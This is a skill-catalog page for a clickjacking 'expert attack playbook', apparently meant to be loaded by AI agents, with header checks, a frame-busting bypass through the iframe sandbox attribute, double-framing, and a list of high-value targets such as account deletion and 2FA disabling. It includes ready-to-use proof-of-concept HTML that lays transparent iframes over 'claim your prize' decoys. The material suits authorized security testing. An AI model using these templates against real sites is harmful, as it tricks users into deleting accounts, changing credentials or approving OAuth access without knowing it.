clickjacking
yaklang/hack-skills
Test and exploit clickjacking vulnerabilities by framing target pages and bypassing frame-busting protections.
What is clickjacking?
Clickjacking (UI redress) playbook for testing whether target pages can be framed and whether X-Frame-Options or CSP frame-ancestors are properly configured. Use this skill to identify and demonstrate clickjacking vulnerabilities where transparent iframes overlay attacker UI to trick users into unintended actions on sensitive pages.
- Detect frameable pages by checking X-Frame-Options and CSP frame-ancestors headers
- Create single-click and multi-step clickjacking proof-of-concept payloads
- Bypass frame-busting JavaScript using iframe sandbox attributes
- Test drag-and-drop clickjacking attacks across multiple iframes
- Identify high-impact targets like account deletion, admin actions, and OAuth authorization buttons
How to install clickjacking
npx skills add https://github.com/yaklang/hack-skills --skill clickjackingHow to use clickjacking
- 1.Check the target page's response headers for X-Frame-Options and CSP frame-ancestors directives
- 2.Create a basic iframe PoC to verify the page is frameable
- 3.If frame-busting code is detected, test the sandbox attribute bypass
- 4.Build a clickjacking PoC template with transparent iframe overlaid on decoy UI
- 5.For multi-step actions, reposition the iframe between clicks to align with confirmation buttons
- 6.Test the PoC in target browsers to confirm the vulnerability
Use cases
- Testing whether a sensitive action page (e.g., account deletion) can be framed and exploited
- Verifying X-Frame-Options and CSP frame-ancestors are properly set on admin panels
- Demonstrating multi-step clickjacking attacks that require user confirmation clicks
- Bypassing frame-busting scripts using sandbox attribute restrictions
- Chaining clickjacking with other vulnerabilities to escalate low-severity findings
- Security testers and penetration testers
- Web application security researchers
- Bug bounty hunters targeting UI redress vulnerabilities
- DevSecOps engineers validating frame protection headers
clickjacking FAQ
X-Frame-Options is a legacy HTTP header that controls framing. CSP frame-ancestors is the modern Content-Security-Policy directive that supersedes it in modern browsers. Both should be checked; CSP frame-ancestors takes precedence if both are present.
Use the iframe sandbox attribute without allow-top-navigation: <iframe src="target" sandbox="allow-forms allow-scripts"></iframe>. This prevents the frame-busting script from breaking out of the iframe.
Clickjacking is typically low-severity unless it targets high-value actions like account deletion, admin role changes, OAuth authorization, payment confirmation, or disabling two-factor authentication. Chaining with other vulnerabilities (e.g., CSRF) can escalate severity.
Yes, clickjacking works on both HTTP and HTTPS pages. The vulnerability depends on frame protection headers, not the protocol. However, some modern browsers may block mixed-content framing.
Single-click targets actions that execute immediately (e.g., delete with URL parameter). Multi-step requires repositioning the iframe between clicks to align with confirmation buttons or form fields.
Full instructions (SKILL.md)
Source of truth, from yaklang/hack-skills.
name: clickjacking description: >- Clickjacking playbook. Use when testing whether target pages can be framed, whether X-Frame-Options or CSP frame-ancestors are properly configured, and whether UI redress attacks can trigger sensitive actions.
SKILL: Clickjacking — Expert Attack Playbook
AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.
1. CORE CONCEPT
Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.
<style>
iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }
.decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }
</style>
<div class="decoy"><button>Click to win a prize!</button></div>
<iframe src="https://target.com/account/delete?confirm=yes"></iframe>
2. DETECTION — IS THE PAGE FRAMEABLE?
Check X-Frame-Options Header
X-Frame-Options: DENY → cannot be framed (secure)
X-Frame-Options: SAMEORIGIN → only same-origin framing (secure for cross-origin)
X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent
(header absent) → frameable! (vulnerable)
Check CSP frame-ancestors
Content-Security-Policy: frame-ancestors 'none' → cannot be framed
Content-Security-Policy: frame-ancestors 'self' → same-origin only
Content-Security-Policy: frame-ancestors https://a.com → specific origin
(directive absent) → frameable
CSP frame-ancestors supersedes X-Frame-Options in modern browsers.
Quick PoC Test
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>
If the page loads in the iframe → frameable → potentially vulnerable.
JavaScript Frame Detection (from target page source)
// Common frame-busting code found in target pages:
if (top.location.hostname !== self.location.hostname) {
top.location.href = self.location.href;
}
If this code is present but not using CSP frame-ancestors, it can often be bypassed.
3. PROOF OF CONCEPT TEMPLATES
Basic Single-Click
<html>
<head><title>Free Prize</title></head>
<body>
<h1>Click the button to claim your prize!</h1>
<style>
iframe { position: absolute; top: 300px; left: 60px;
width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }
</style>
<iframe src="https://target.com/account/settings?action=delete"></iframe>
</body>
</html>
Multi-Step Clickjacking
For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):
<div id="step1">
<button onclick="document.getElementById('step1').style.display='none';
document.getElementById('step2').style.display='block';">
Step 1: Click here
</button>
</div>
<div id="step2" style="display:none">
<button>Step 2: Confirm</button>
</div>
<iframe src="https://target.com/admin/action"></iframe>
Reposition iframe for each step to align the transparent button with the decoy.
Drag-and-Drop Clickjacking
Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.
4. BYPASS TECHNIQUES
Frame-Busting Script Bypass
Some pages use JavaScript frame-busting:
if (top !== self) { top.location = self.location; }
Bypass with sandbox attribute:
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->
X-Frame-Options ALLOW-FROM Bypass
ALLOW-FROM is not supported in Chrome/Safari. If the server relies solely on ALLOW-FROM, modern browsers ignore it → page is frameable.
Double-Framing
If X-Frame-Options: SAMEORIGIN is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.
5. HIGH-IMPACT TARGETS
Account deletion page
Email/password change form
Admin panel actions (add user, change role)
Payment confirmation
OAuth authorization ("Allow" button)
Two-factor authentication disable
API key generation
Webhook configuration
6. TESTING CHECKLIST
□ Check X-Frame-Options header on sensitive pages
□ Check CSP frame-ancestors directive
□ Create iframe PoC and verify page loads
□ Test frame-busting scripts — try sandbox attribute bypass
□ Identify high-value single-click actions
□ For multi-step actions, build multi-click PoC
□ Test both authenticated and unauthenticated pages
□ Verify ALLOW-FROM behavior across browsers
Related skills
More from yaklang/hack-skills and the wider catalog.

cmdi-command-injection
Expert command injection attack playbook for shell metacharacters, blind detection, and OOB exfiltration.

code-obfuscation-deobfuscation
Identify and defeat code obfuscation: junk code, opaque predicates, SMC, control flow flattening, VM protectors, and string encryption.

container-escape-techniques
Expert container escape techniques for Docker, Kubernetes, and LXC breakout via privileged mode, capabilities, and runtime vulnerabilities.

cors-cross-origin-misconfiguration
Test CORS misconfigurations: reflected origins, credentialed requests, wildcard trust, and origin allowlist bypasses.

crlf-injection
CRLF injection attack playbook for HTTP response splitting, header injection, and cache poisoning.

csp-bypass-advanced
Advanced Content Security Policy bypass techniques for XSS, nonce abuse, and trusted endpoint exploitation.